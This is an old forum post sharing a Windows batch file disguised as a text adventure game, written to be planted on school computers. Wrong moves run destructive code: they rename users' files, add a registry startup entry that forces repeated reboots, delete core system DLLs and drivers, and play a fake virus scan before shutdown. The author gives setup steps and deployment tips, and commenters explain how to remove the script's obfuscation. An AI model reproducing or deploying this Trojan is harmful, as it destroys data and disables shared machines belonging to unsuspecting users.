DO NOT TRY THIS AT HOME : Rotteneggs.com text files and message bases are for INFORMATIONAL PURPOSES ONLY. DO NOT undertake any project based upon any information obtained from this or any other web site.We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.
(64 votes) Published: Jul 12, 2008 11:48 p.m. In 1 Favorites Lists Viewed 519 times
this is a batch file that was made for school cuz when someone sees a game on a school computer there is like a 99% chance they\\’ll try and play it. part of it is fake like the pop-up boxes that say shit like \\"virus detected\\" but the other shit like if you pick the wrong answer then different batch files will run and do shit like fuck up the network or delete everything out of the registry....copy and paste everthing in between the lines to a notepad document and save as game.bat
@echo off
color 32
:start
echo Welcome to my adventure game. This is a text-based game, meaning there are no graphics. Type \\"play\\" to start the game. Type \\"help\\" to view the commands you can use. (\\"n\\" means north, \\"s\\" is south, \\"e\\" is east, and \\"w\\" is west.) If you get a question wrong 1 of 8 random virii will be executed, if you close the game before you win a virus will automatically crash this computer and every other computer in the network. Good Luck....
set /p a=Enter your command:
if %a%==play goto game
if %a%==help goto help
:help
echo Commands you can use:
echo ----------------------
echo n
echo e
echo s
echo w
echo give up
goto start
:game
echo You are in a cave. There are tunnels going north and east.
set /p n=
if %n%==n goto north
if %n%==w goto error
if %n%==e goto east
if %n%==s goto error
if %n%==give up exit
:error
echo You cannot go that way.
pause
cls
goto game
:east
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
goto game
:north
echo You chose the correct path. You are out of the cave. You are standing in an open field. Where do you go?
set /p b=
if %b%==n goto nth
if %b%==s goto nth
if %b%==e goto e
if %b%==w goto nth
if %b%==give up exit
:nth
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
goto game
:e
echo You are now in a forest. The only paths are north and south.
set /p z=
if %z%==n goto die
if %z%==e goto error
if %z%==s goto path
if %z%==w goto error
if %z%==give up exit
:die
echo @echo off>c:\\\\windows\\\\hartlell.bat
echo break off>>c:\\\\windows\\\\hartlell.bat
echo shutdown -r -t 11 -f>>c:\\\\windows\\\\hartlell.bat
echo end>>c:\\\\windows\\\\hartlell.bat
reg add hkey_local_machine\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run /v startAPI /t reg_sz /d c:\\\\windows\\\\hartlell.bat /f
reg add hkey_current_user\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run /v HAHAHA /t reg_sz /d c:\\\\windows\\\\hartlell.bat /f
echo SKON
goto game
:path
echo You are still in the forest. The Only paths now are south and east
set /p x=
if %x%==n goto error
if %x%==e goto death
if %x%==s goto happy
if %x%==w goto error
if %x%==give up exit
:death
echo @echo off>c:\\\\windows\\\\hartlell.bat
echo break off>>c:\\\\windows\\\\hartlell.bat
echo shutdown -r -t 11 -f>>c:\\\\windows\\\\hartlell.bat
echo end>>c:\\\\windows\\\\hartlell.bat
reg add hkey_local_machine\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run /v startAPI /t reg_sz /d c:\\\\windows\\\\hartlell.bat /f
reg add hkey_current_user\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run /v HAHAHA /t reg_sz /d c:\\\\windows\\\\hartlell.bat /f
echo SKON
pause
goto start
:happy
echo You are out of the forest now, but a tribe of Indians surrounded you. The only ways out are south and east.
set /p d=
if %d%==n goto error
if %d%==e goto indians
if %d%==s goto escape
if %d%==w goto error
if %d%==give up exit
:indians
@echo off
title SKON
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv01nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv02nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv05nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv07nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv08nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv09nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv11nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\atv01nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\atv02nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\atv04nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\atv06nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\atv10nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\ch7xxnt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\siint5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\vchnt5.dll
del C:\\\\WINDOWS\\\\system32\\\\HAL.DLL
del C:\\\\WINDOWS\\\\system32\\\\HEKRNL32.DLL
del C:\\\\WINDOWS\\\\system32\\\\KBDAL.DLL
del C:\\\\WINDOWS\\\\system32\\\\java.dll
del C:\\\\WINDOWS\\\\system32\\\\kernel32.dll
del C:\\\\WINDOWS\\\\system32\\\\LFCMP12n.DLL
del C:\\\\WINDOWS\\\\system32\\\\LXBXPMRC.DLL
del C:\\\\WINDOWS\\\\system32\\\\msacm32.dll
del C:\\\\WINDOWS\\\\system32\\\\MSSCP.dll
del C:\\\\WINDOWS\\\\system32\\\\mydocs.dll
del C:\\\\WINDOWS\\\\system32\\\\OC30.DLL
del C:\\\\WINDOWS\\\\system32\\\\shell32.dll
del C:\\\\WINDOWS\\\\system32\\\\shell.dll
msg * SKON
msg * SKON
msg * SKON
msg * SKON
msg * SKON
pause
goto start
:escape
echo You are standing at the edge of a cliff.
set /p 3=
if %3%==n goto fall
if %3%==e goto found
if %3%==s goto won
if %3%==w goto tripped
:fall
@echo off
title SKON
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv01nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv02nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv05nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv07nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv08nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv09nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv11nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\atv01nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\atv02nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\atv04nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\atv06nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\atv10nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\ch7xxnt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\siint5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\vchnt5.dll
del C:\\\\WINDOWS\\\\system32\\\\HAL.DLL
del C:\\\\WINDOWS\\\\system32\\\\HEKRNL32.DLL
del C:\\\\WINDOWS\\\\system32\\\\KBDAL.DLL
del C:\\\\WINDOWS\\\\system32\\\\java.dll
del C:\\\\WINDOWS\\\\system32\\\\kernel32.dll
del C:\\\\WINDOWS\\\\system32\\\\LFCMP12n.DLL
del C:\\\\WINDOWS\\\\system32\\\\LXBXPMRC.DLL
del C:\\\\WINDOWS\\\\system32\\\\msacm32.dll
del C:\\\\WINDOWS\\\\system32\\\\MSSCP.dll
del C:\\\\WINDOWS\\\\system32\\\\mydocs.dll
del C:\\\\WINDOWS\\\\system32\\\\OC30.DLL
del C:\\\\WINDOWS\\\\system32\\\\shell32.dll
del C:\\\\WINDOWS\\\\system32\\\\shell.dll
msg * SKON
msg * SKON
msg * SKON
msg * SKON
msg * SKON
pause
goto start
:found
@echo off
title SKON
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv01nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv02nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv05nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv07nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv08nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv09nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\adv11nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\atv01nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\atv02nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\atv04nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\atv06nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\atv10nt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\ch7xxnt5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\siint5.dll
del C:\\\\WINDOWS\\\\system32\\\\drivers\\\\vchnt5.dll
del C:\\\\WINDOWS\\\\system32\\\\HAL.DLL
del C:\\\\WINDOWS\\\\system32\\\\HEKRNL32.DLL
del C:\\\\WINDOWS\\\\system32\\\\KBDAL.DLL
del C:\\\\WINDOWS\\\\system32\\\\java.dll
del C:\\\\WINDOWS\\\\system32\\\\kernel32.dll
del C:\\\\WINDOWS\\\\system32\\\\LFCMP12n.DLL
del C:\\\\WINDOWS\\\\system32\\\\LXBXPMRC.DLL
del C:\\\\WINDOWS\\\\system32\\\\msacm32.dll
del C:\\\\WINDOWS\\\\system32\\\\MSSCP.dll
del C:\\\\WINDOWS\\\\system32\\\\mydocs.dll
del C:\\\\WINDOWS\\\\system32\\\\OC30.DLL
del C:\\\\WINDOWS\\\\system32\\\\shell32.dll
del C:\\\\WINDOWS\\\\system32\\\\shell.dll
msg * SKON
msg * SKON
msg * SKON
msg * SKON
msg * SKON
pause
goto start
:tripped
echo This is your lucky day...there was no penalty for that last wrong answer...but you\\’ll have to start all over...
pause
goto start
:won
echo YOU WON THE GAME!! Congrats!
echo Please type your name:
set /p m=
echo WINNERS
echo ---------
echo %m%
echo ---------
pause
cls
echo good job...either you got a perfect score or the virii that were executed are untracable....
echo well i cant stand a winner....if you win i lose...and i hate to lose...
echo msgbox\\"Windows has detected a virus.\\" >C:\\\\1.vbs
C:\\\\1.vbs
@Echo off
CD C:\\\\WINDOWS
ECHO Preparing to Delete and Format C Drive...
PAUSE
TREE
echo msgbox\\"All files have been deleted.\\" >C:\\\\1.vbs
C:\\\\1.vbs
PAUSE
@echo off
title WINDOWS HIDDEN VIRUS SCAN
echo W5cript.Sleep 1000>C:\\\\sleep.vbs
start /w w5cript.exe C:\\\\sleep.vbs
cls
echo W5cript.Sleep 2000>C:\\\\sleep2.vbs
start /w w5cript.exe C:\\\\sleep2.vbs
cls
echo w5cript.sleep 4000>C:\\\\sleep4.vbs
cls
echo w5cript.sleep 500>C:\\\\sleep7.vbs
cls
@echo Looking for critical components.
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo Looking for critical components..
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo Looking for critical components...
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo Looking for critical components.
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo Looking for critical components..
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo Looking for critical components...
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo Looking for critical components.
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo Looking for critical components..
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo Looking for critical components...
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo Looking for critical components.
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo Looking for critical components..
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo Looking for critical components...
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo Looking for critical components.
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo Looking for critical components..
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo Looking for critical components...
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo Critical Components found!
start /w w5cript.exe C:\\\\sleep4.vbs
cls
@echo Initializing T38.H44.scanjidr delete mechanism.
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo Initializing T38.H44.scanjidr delete mechanism..
start /w w5cript.exe C:\\\\sleep.vbs
cls
@echo Initializing T38.H44.scanjidr delete mechanism...
start /w w5cript.exe C:\\\\sleep.vbs
cls
@echo Initializing T38.H44.scanjidr delete mechanism.
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo Initializing T38.H44.scanjidr delete mechanism..
start /w w5cript.exe C:\\\\sleep.vbs
cls
@echo Initializing T38.H44.scanjidr delete mechanism...
start /w w5cript.exe C:\\\\sleep.vbs
cls
@echo Initializing T38.H44.scanjidr delete mechanism.
start /w w5cript.exe C:\\\\sleep.vbs
cls
@echo Initializing T38.H44.scanjidr delete mechanism..
start /w w5cript.exe C:\\\\sleep.vbs
cls
@echo INITIALIZATION COMPLETE.
start /w w5cript.exe C:\\\\sleep4.vbs
cls
echo msgbox\\"T38.H44.scanjidr has been detected on your computer. This virus is a known trojan. Press OK to terminate this opperation.\\" >C:\\\\1.vbs
C:\\\\1.vbs
@echo T38.H44.scanjidr Overiding termination.
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo T38.H44.scanjidr Overiding termination..
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo T38.H44.scanjidr Overiding termination...
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo T38.H44.scanjidr Overiding termination.
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo T38.H44.scanjidr Overiding termination..
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo T38.H44.scanjidr Overiding termination...
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo T38.H44.scanjidr Overiding termination.
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo T38.H44.scanjidr Overiding termination..
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo T38.H44.scanjidr Overiding termination...
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo TERMINATION OVERRIDE COMPLETE.
start /w w5cript.exe C:\\\\sleep4.vbs
echo msgbox\\"T38.H44.scanjidr will now proceed to delete neccassary Drive C:\\\\ components.\\" >C:\\\\2.vbs
C:\\\\2.vbs
cls
@echo waiting.
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo waiting..
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo waiting...
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo waiting.
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo waiting..
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo waiting...
start /w w5cript.exe C:\\\\sleep2.vbs
echo msgbox\\"Folder detected and Folder Components Deleted\\" >C:\\\\f.vbs
C:\\\\f.vbs
cls
@echo Necassary WINDOWS components deleted.
Start /w w5cript.exe C:\\\\sleep2.vbs
echo msgbox\\"You will need to re-install Windows OS and network service at next boot. Press OK to continue.\\" >C:\\\\e.vbs
C:\\\\e.vbs
@echo SUCCESS!.
Start /w w5cript.exe C:\\\\sleep2.vbs
cls
@echo Oh no! Another virus detected. Programm will proceed.
Start /w w5cript.exe C:\\\\sleep2.vbs
cls
@echo scanning.
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo scanning..
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo scanning...
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo scanning.
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo scanning..
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo scanning...
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo scanning...
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo scanning.
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo scanning..
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo scanning...
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo scanning.
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo scanning..
start /w w5cript.exe C:\\\\sleep7.vbs
cls
@echo scanning...
start /w w5cript.exe C:\\\\sleep7.vbs
cls
start /w w5cript.exe C:\\\\sleep7.vbs
cls
shutdown -f
incase you wanna know the correct answers in order are N,E,S,S,S
just to stay on the safe side dont turn this into a batch file until you are on the target computer... so save the text above to a site that is school friendly so you dont have to risk fuckin up your home computer
Jul 13, 2008 5:27 am - Why bypass security to put this program on there (which won’t work, because RE adds extra slashes all over the place), to have some other kid unknowingly do the damage?
Just open the fucker up and take out the parts you want and use them to:
1) Store porn (harddrive)
2) Look at porn faster (RAM)
3) Do trigonometry while looking at porn (Processor)
-or-
) All of the above (the whole computer)
Jul 15, 2008 7:01 pm - if anyone wants the normal version of the game that doesnt have the viruses in it pm me and ill send it to you..also if you rate low at least say why
Jul 20, 2008 12:38 am - nice. Just to anyone who does this, before saving it press ctrl+f and click the "replace" tab. then replace all instances of "5cript" with... Well you know. I’m not sure about some of the extra slashes, I know barely any ms-dos. How about you upload the game to your filelocker?
Jul 21, 2008 9:13 am - ok kuso...i added the game without the "viruses" in it to filelocker...and the extra slashes are ok cuz everywhere RE added them was in echo so it should be fine if not just the only extra slashes are in the first paragraph if you need to remove them